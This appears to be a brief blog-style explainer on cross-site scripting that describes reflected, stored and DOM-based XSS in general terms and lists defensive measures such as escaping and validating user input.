Firstly it’s a very serious and very real attack vector, and in fact it’s 7th on the most recent OWASP threat list. According to Symantec, as of 2007 it accounted for around 84% of all security vulnerabilities on web sites.
In short, XSS is where script is injected into a web page which is viewed by others. Web pages which are formed using HTML (and other languages) parse code to display the page. Injecting a script means that the code is run and executed. This can lead to anything from annoying pop up messages, stealing of cookies, credentials, re-direction to other websites.
Types of XSS
This is the least serious attack as it is a non-persistent threat. The injected code is not stored by the server, and so it usually forms part of the URL. The vulnerability is that the server does not properly validate the URL and query, and it does not strip special characters out (escaping). This results in the server executing the code contained within the web address.
This is a serious threat and can have terrible consequences for a website and it’s users. The injected string and code is actually stored server-side. This means that any subsequent visitors to the page on the site will be actually re-running the injected code. It’s likely they’ll have no idea as malicious code is unlikely to display anything, it will blindly run in the background.
In this type of attack the malicious script is injected into the DOM rather than as part of the HTML page. Common objects/entities to attack include document.url, document.location and document.referrer.
How do I prevent this?
- Fully escape user input so that malicious scripts and characters such as < and > are not executed
- Use a framework that is XSS protected
- Validate input – a good mindset is always assume the input is malicious
- Monitor website, logs and files carefully. Regularly review databases, file integrity and test your site, looking for odd and irregular activity
- Ask a friend to test your site for these vulnerabilities (probably best in a sandbox environment or a mirrored site!)